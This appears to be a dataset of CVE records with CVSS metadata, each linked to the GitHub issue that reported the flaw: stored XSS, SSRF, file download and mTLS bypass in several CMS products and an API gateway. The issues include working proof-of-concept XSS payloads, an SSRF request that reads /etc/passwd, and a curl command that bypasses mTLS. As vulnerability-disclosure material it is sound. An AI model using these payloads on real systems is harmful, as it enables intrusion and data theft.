**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Shoutbox" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the panel 2. Go to 'php-fusion/infusions/shoutbox_panel/shoutbox_admin.php' 3. Click on 'Infusion' -> 'Shoutbox Admin' -> 'New Shout' 4. Insert payload XSS: `<svg><script xlink:href=data:,alert(1337) />` 5. Send Message 6. xss alert message **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** insert payload xss: ![insert_payload_shoutbox](https://user-images.githubusercontent.com/62001260/82175416-0c146600-98fe-11ea-873c-e209735b9976.PNG) xss alert message: ![shoutbox_alert_mess](https://user-images.githubusercontent.com/62001260/82175522-47169980-98fe-11ea-9a8e-93622aab7cf4.PNG) ![shoutbox2_alert_message](https://user-images.githubusercontent.com/62001260/82175527-4b42b700-98fe-11ea-9300-a38a3682f447.PNG) **Desktop (please complete the following information):** - OS: Windows - Browser: All - Version
Cross Site Script Vulnerability on "Shoutbox Admin" in PHP-Fusion feature 9.03.60
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2328/comments
1
2020-05-18T04:56:09Z
2020-06-08T02:21:36Z
https://github.com/PHPFusion/PHPFusion/issues/2328
619,907,890
2,328
2,149
CVE-2020-20582
2021-07-08T16:15:08.177
A server side request forgery (SSRF) vulnerability in /ApiAdminDomainSettings.php of MipCMS 5.0.1 allows attackers to access sensitive information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sansanyun/mipcms5/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sansanyun/mipcms5/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mipcms:mipcms:5.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "E53F8465-2D63-48AB-B3A0-99B254630565", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/sansanyun/mipcms5/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sansanyun", "mipcms5" ]
Vulnerability location:`app/setting/controller/ApiAdminDomainSettings.php`: ![image](https://user-images.githubusercontent.com/24487351/65828554-a4f26480-e2ce-11e9-8026-bd36d692df49.png) The problem arises in line 28——39: ```php $ch = curl_init(); $options = array( CURLOPT_URL => $api, CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_POSTFIELDS => implode("\n", $urls), CURLOPT_HTTPHEADER => array('Content-Type: text/plain'), ); curl_setopt_array($ch, $options); $result = curl_exec($ch); ``` Using curl_exec, `$api` is controllable and only `trim` is made to the `$api` parameter in the above code without any filtering, and finally the json encoded data is returned. poc: ```php http://site/index.php?s=/setting/ApiAdminDomainSettings/urlPost post: postAddress=file:///etc/passwd&url=xx&id= ``` ![image](https://user-images.githubusercontent.com/24487351/65828547-999f3900-e2ce-11e9-96b9-3041e12aaf04.png)
There is one SSRF vulnerability that can get some sensitive information
https://api.github.com/repos/sansanyun/mipjz/issues/5/comments
1
2019-09-29T07:35:36Z
2021-07-09T07:33:44Z
https://github.com/sansanyun/mipjz/issues/5
499,873,240
5
2,150
CVE-2020-20363
2021-07-08T18:15:17.637
Crossi Site Scripting (XSS) vulnerability in PbootCMS 2.0.3 in admin.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://pbootcms.com" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://github.com/hnaoyun/PbootCMS" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wind226/CVE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://pbootcms.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/hnaoyun/PbootCMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wind226/CVE/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pbootcms:pbootcms:2.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "91B2CF5D-DF3E-4EAC-9DF3-14A0F4D205E8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wind226/CVE/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wind226", "CVE" ]
step1 Access admin page http://www.wind-shell.com/admin.php step2 http://www.wind-shell.com/admin.php?p=/Content/mod/mcode/2/id/8&backurl=L2FkbWluLnBocD9wPS9Db250ZW50L2luZGV4L21jb2RlLzI= ![image](https://user-images.githubusercontent.com/24953996/68994002-b01e4580-08b8-11ea-8c54-54ca781c109b.png) step3 http://www.wind-shell.com/ ![image](https://user-images.githubusercontent.com/24953996/68994025-f5427780-08b8-11ea-9be1-03da84bf94ad.png) ste4 XSS Trigger point ![image](https://user-images.githubusercontent.com/24953996/68994030-01c6d000-08b9-11ea-82e4-7ecdb955a0ed.png)
Pbootcms background storage XSS
https://api.github.com/repos/wind226/CVE/issues/1/comments
0
2019-11-16T13:35:52Z
2019-11-16T13:36:48Z
https://github.com/wind226/CVE/issues/1
523,846,055
1
2,151
CVE-2020-22535
2021-07-09T16:15:08.427
Incorrect Access Control vulnerability in PbootCMS 2.0.6 via the list parameter in the update function in upgradecontroller.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Pbootcms/Pbootcms/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Pbootcms/Pbootcms/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pbootcms:pbootcms:2.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "534276EE-85DA-4CD1-81BA-E367314EEBDD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "668" ]
668
https://github.com/Pbootcms/Pbootcms/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Pbootcms", "Pbootcms" ]
The vulnerability lies in the update function of the upgradecontroller.php file. In this function, the 'list' variable is spliced into the path without filtering, so any file can be copied under the '/ backup / upgrade /' path, and then the file can be downloaded by directly accessing the file. 1.Log in to the / admin.php page. ![image](https://user-images.githubusercontent.com/57693945/77150464-e5d57400-6ace-11ea-9e46-8969533e3bbf.png) 2.Post the '/ pbootcms / Admin. PHP? P = / upgrade / update' to request that the contents of the list point to the file to be downloaded ![aaaa](https://user-images.githubusercontent.com/57693945/77163838-ecbdb000-6ae9-11ea-965b-10df6f1a406d.png) 3.Next, visit '\ pbootcms \ static \ backup \ extensions \ nginx1.15.11 \ conf \ nginx. Conf' to download to the file ![bbb](https://user-images.githubusercontent.com/57693945/77164011-4cb45680-6aea-11ea-951a-4ad81edb60ca.png) code ![image](https://user-images.githubusercontent.com/57693945/77164093-7e2d2200-6aea-11ea-8baa-a3dafd878591.png) The filtering of 'list' is not strict.
Pbootcms2.0.6 has a management background arbitrary file download vulnerability
https://api.github.com/repos/Pbootcms/Pbootcms/issues/5/comments
0
2020-03-20T12:37:57Z
2020-03-20T12:37:57Z
https://github.com/Pbootcms/Pbootcms/issues/5
585,042,181
5
2,152
CVE-2020-21333
2021-07-09T17:15:07.770
Cross Site Scripting (XSS) vulnerability in PublicCMS 4.0 to get an admin cookie when the Administrator reviews submit case.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sanluan/PublicCMS/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sanluan/PublicCMS/issues/27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:publiccms:publiccms:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA4CCE59-6A71-4BC4-86D4-3110B04C1082", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/sanluan/PublicCMS/issues/27
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sanluan", "PublicCMS" ]
Background storage XSS step1: https://cms.publiccms.com/case.html Submit case ![image](https://user-images.githubusercontent.com/24953996/69142990-eea74080-0b02-11ea-8909-6139218755ba.png) step2: Administrator review submit case trigger xss ![image](https://user-images.githubusercontent.com/24953996/69143072-26ae8380-0b03-11ea-8dc6-8ff39e4e5d63.png) Click to trigger xss ![image](https://user-images.githubusercontent.com/24953996/69143110-38902680-0b03-11ea-837a-e552dbeb83d7.png)
Background storage XSS
https://api.github.com/repos/sanluan/PublicCMS/issues/27/comments
5
2019-11-19T11:31:53Z
2019-12-07T14:38:40Z
https://github.com/sanluan/PublicCMS/issues/27
524,951,345
27
2,153
CVE-2021-36371
2021-07-09T21:15:08.583
Emissary-Ingress (formerly Ambassador API Gateway) through 1.13.9 allows attackers to bypass client certificate requirements (i.e., mTLS cert_required) on backend upstreams when more than one TLSContext is defined and at least one configuration exists that does not require client certificate authentication. The attacker must send an SNI specifying an unprotected backend and an HTTP Host header specifying a protected backend. (2.x versions are unaffected. 1.x versions are unaffected with certain configuration settings involving prune_unreachable_routes and a wildcard Host resource.)
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/emissary-ingress/emissary/issues/3340" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/emissary-ingress/emissary/releases/tag/v2.0.0-ea" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/emissary-ingress/emissary/issues/3340" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/emissary-ingress/emissary/releases/tag/v2.0.0-ea" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getambassador:emissary-ingress:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B2281C9-BA17-4B88-A762-3CA71940E3A5", "versionEndExcluding": null, "versionEndIncluding": "1.13.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/emissary-ingress/emissary/issues/3340
[ "Exploit", "Third Party Advisory" ]
github.com
[ "emissary-ingress", "emissary" ]
**Describe the bug** If Ambassador is deployed with multiple hosts/tlscontexts with some using mTLS (`cert_required: true`) and some not, it is possible to bypass the mTLS requirements for the backends that have it configured by sending an SNI for a TLSContext that does not. I believe this stems from the fact that Ambassador matches TLSContexts based on SNI, but Mappings based on Host header. If `service1.upstream` does not require mTLS but `service2.upstream` does, it looks like its possible to talk directly to `service1.upstream` without a valid client certificate by doing something like: ``` curl -H "Host: service2.upstream" https://service1.upstream ``` In some configurations it is also possible to do the same by just talking directly to the Ambassador LoadBalancer IP address (not sending SNI at all). This works if the "default" TLSContext does not require mTLS (I'm not exactly clear what TLSContext Ambassador will fall back on if no SNI is given) **To Reproduce** I've put together a working minimal example with 2 services and the YAML configurations: https://gist.github.com/ropnop/f306a8b46957dbf3a5199899b72be0b5 ``` $ /usr/bin/curl --cacert certs/ServerTestCA.crt https://echo.test curl: (35) error:1401E410:SSL routines:CONNECT_CR_FINISHED:sslv3 alert handshake failure $ /usr/bin/curl --cacert certs/ServerTestCA.crt -H "Host: echo.test" https://quote.test CLIENT VALUES: client_address=('10.1.0.8', 49418) (10.1.0.8) command=GET path=/ real path=/ query= request_version=HTTP/1.1 SERVER VALUES: server_version=BaseHTTP/0.6 sys_version=Python/3.5.0 protocol_version=HTTP/1.0 HEADERS RECEIVED: accept=*/* content-length=0 host=echo.test user-agent=curl/7.64.1 x-envoy-expected-rq-timeout-ms=3000 x-envoy-internal=true x-envoy-original-path=/ x-forwarded-for=192.168.65.3 x-forwarded-proto=https x-request-id=846c224a-c63f-444b-b68d-68aee96122ae ``` **Expected behavior** Ambassador should not apply a Host mapping if the SNI does not match. If this is expected behavior and you can't securely mix mTLS and non-mTLS upstreams this should definitely be called out in the docs for those who need to rely on mTLS authentication. **Versions (please complete the following information):** - Ambassador: 1.7.2 - Kubernetes environment: EKS and DockerDesktop - Version: 1.16 and 1.19 **Additional context** It is possible my configuration is bad/wrong, so if I have missed something in the docs please let me know
Bypass mTLS by mixing SNI and Host headers
https://api.github.com/repos/emissary-ingress/emissary/issues/3340/comments
6
2021-04-13T21:29:23Z
2021-07-07T20:24:56Z
https://github.com/emissary-ingress/emissary/issues/3340
857,337,366
3,340
2,154
CVE-2020-25394
2021-07-09T22:15:07.967
A stored cross site scripting (XSS) vulnerability in moziloCMS 2.0 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Content" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mozilo/mozilo2.0/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mozilo/mozilo2.0/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mozilo:mozilocms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "90FBE733-9D6E-42A6-989D-80264913A262", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/mozilo/mozilo2.0/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mozilo", "mozilo2.0" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Content" feature. **To Reproduce** Steps to reproduce the behavior: 1, Login into the panel 2. Go to "mozilo2.0-master/admin/index.php?nojs=true&action=catpage&multi=true" 3. Click Edit "Content" 4. Insert Payload: '><details/ open/ontoggle=confirm (document.domain)> 5. Save 6. Click Edit 7. XSS Alert Message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. **Screenshots** 1. Infor moziloCMS Admin: ![1](https://user-images.githubusercontent.com/62001260/92432434-5169e580-f1c4-11ea-8143-65dc3fb64b61.PNG) 2. Go to "Content" and Edit: ![2](https://user-images.githubusercontent.com/62001260/92432458-621a5b80-f1c4-11ea-9e16-1acc2088d957.PNG) 3. Insert Payload XSS: ![3](https://user-images.githubusercontent.com/62001260/92432468-6fcfe100-f1c4-11ea-8bb4-dc604c892102.PNG) 4. XSS Alert Message: ![4](https://user-images.githubusercontent.com/62001260/92432478-778f8580-f1c4-11ea-9b22-0ab4e53174ed.PNG) **Desktop (please complete the following information):** OS: Windows Browser Chorme Version 85.0.4183.83 (Official Build) (64-bit)
Cross Site Script Vulnerability on "content" in moziloCMS Admin 2.0 ("Amalia")
https://api.github.com/repos/moziloDasEinsteigerCMS/mozilo2.0/issues/28/comments
1
2020-09-08T04:17:40Z
2021-07-10T12:16:44Z
https://github.com/moziloDasEinsteigerCMS/mozilo2.0/issues/28
695,532,657
28
2,155
CVE-2020-25875
2021-07-09T22:15:08.003
A stored cross site scripting (XSS) vulnerability in the 'Smileys' feature of Codoforum v5.0.2 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payload entered into the 'Smiley Code' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://codoforum.com/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://codoforum.com/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codologic:codoforum:5.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "2BCBD3E3-DEEA-488B-8246-F77BE6CB778D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/xss_payload/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "xss_payload" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Smileys" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the Admin panel 2. Go to 'codoforum/admin/index.php?page=ui/smileys' 3. Click smileys 4. Choese smileys >> Click Edit 5. Insert Payload 'Smiley Code': '><details/open/ontoggle=confirm(1337)> 6. Click Save 7. Go to Page 'codoforum/admin/index.php?page=ui/smileys' 8. XSS Alert Message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screenshots** 1. Chose smiley ![4](https://user-images.githubusercontent.com/62001260/93164965-ffd1d580-f744-11ea-8ef3-787315b2ebb0.PNG) 2. insert payload ![5](https://user-images.githubusercontent.com/62001260/93164969-02ccc600-f745-11ea-9d7d-db55033e7c3f.PNG) 3. xss alert mess ![6](https://user-images.githubusercontent.com/62001260/93164970-03655c80-f745-11ea-8354-ee2766f0e70e.PNG) **Desktop (please complete the following information):** OS: Windows Browser: All Version
Cross Site Script Vulnerability on "UI Elments" in Codoforum feature V.5.0.2
https://api.github.com/repos/r0ck3t1973/xss_payload/issues/4/comments
1
2020-09-15T04:18:12Z
2021-07-10T12:16:14Z
https://github.com/r0ck3t1973/xss_payload/issues/4
701,594,196
4
2,156
CVE-2020-25876
2021-07-09T22:15:08.040
A stored cross site scripting (XSS) vulnerability in the 'Pages' feature of Codoforum v5.0.2 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payload entered into the 'Page Title' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://codoforum.com/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://codoforum.com/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codologic:codoforum:5.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "2BCBD3E3-DEEA-488B-8246-F77BE6CB778D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/xss_payload/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "xss_payload" ]
